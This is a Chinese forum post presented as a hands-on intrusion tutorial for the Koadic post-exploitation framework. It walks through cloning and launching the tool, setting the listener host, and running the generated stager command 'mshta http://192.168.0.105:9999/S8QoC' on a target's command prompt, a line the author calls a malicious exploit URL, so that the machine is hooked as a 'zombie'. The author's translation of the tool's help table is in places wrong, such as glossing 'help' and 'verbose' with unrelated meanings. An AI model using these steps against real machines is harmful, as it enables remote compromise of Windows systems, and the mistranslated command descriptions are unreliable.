渗透工具Koadic实战入侵教程 教程

admin 5月前 882

前言:

在朋友的博客上看到推荐的一款工具Koadic,我接触了以后发现很不错这款工具的强大之处我觉得就是拿到shell后的各种模块功能,我就自己写出来发给大家看看吧

首先把项目克隆到本地:

项目地址

https://github.com/zerosum0x0/koadic.git

然后解压,如果你要安装到你指定的目录就先cd到那个目录在下载,我是复制到那了,所以我解压。如下图

后渗透工具Koadic

 

运行koadic

cd koadic-master/           //cd到软件目录

sudo ./koadic          //用最高权限运行koadic

打开Koadic,显示需要设置的内容

下图命令如下

(koadic: sta/js/mshta)# info     //

查看需要设置的内容

后渗透工具Koadic

查看工具使用帮助

(koadic: sta/js/mshta)# help

后渗透工具Koadic

大佬跳过我的翻译,英语很渣而且是全靠感觉翻译的(很辛苦,靠经验和百度翻译蒙)

(koadic: sta/js/mshta)# help        //帮助的意思

COMMAND     DESCRIPTION    命令    描述
———   ————-
load        reloads all modules  //显示
info        shows the current module options//显示当前模块选项。
use         switch to a different module//切换到不同的模块
set         sets a variable for the current module//为当前模块设置一个变量
jobs        shows info about jobs//显示有关工作的信息
help        displays help info for a command//获取一个cmdshell
cmdshell    command shell to interact with a zombie// 命令 shell 与僵尸交互
kill        shows info about jobs//显示有关工作的信息
listeners   shows info about stagers//显示信息的传输器载荷
exit        exits the program//退出
zombies     lists hooked targets//显示所有僵尸会话
run         runs the current module//运行,和exploit一个样
verbose     exits the program//退出程序

进入主题 ,开始设置。听着是不是热血沸腾要往下看了,哈哈。其实没啥要讲的,你只需要set lhost

这个命令大家应该都懂得,就是设置本地ip。

如下图

后渗透工具Koadic

注意看,他生成了一个网址,

其实这是一个恶意网址,里面装载了exploit

最后生成的利用命令如下

mshta http://192.168.0.105:9999/S8QoC

利用方法是放到cmd里面执行

如下图

后渗透工具Koadic

其实你可以看到他弹出了事件查看器我也不知道为什么,不是我点开的啊,

也可能会好奇mshta是什么意思,正解如下

mshta.exe是微软Windows操作系统相关程序,用于执行.HTA文件

我想就是这样利用的吧


少客联盟- 版权声明 1、本主题所有言论和图片纯属会员个人意见,与少客联盟立场无关。
2、本站所有主题由该帖子作者发表,该帖子作者admin少客联盟享有帖子相关版权。
3、少客联盟管理员和版主有权不事先通知发贴者而删除本文。
4、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者admin少客联盟的同意。
5、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任。
6、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责。
7、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意。
8、官方反馈邮箱:chinasuc@chinasuc.cn


上一篇:Axure RP 8 注册码
下一篇:渗透测试DNS暴力破解教程
最新回复 (0)
全部楼主
    • 少客联盟
      2
        登录 注册 QQ登录(停用)
返回
负责声明:本站部分资源来源于网络,如有侵权请发邮件(chinasuc@chinasuc.cn)告知我们,我们将会在24小时内处理。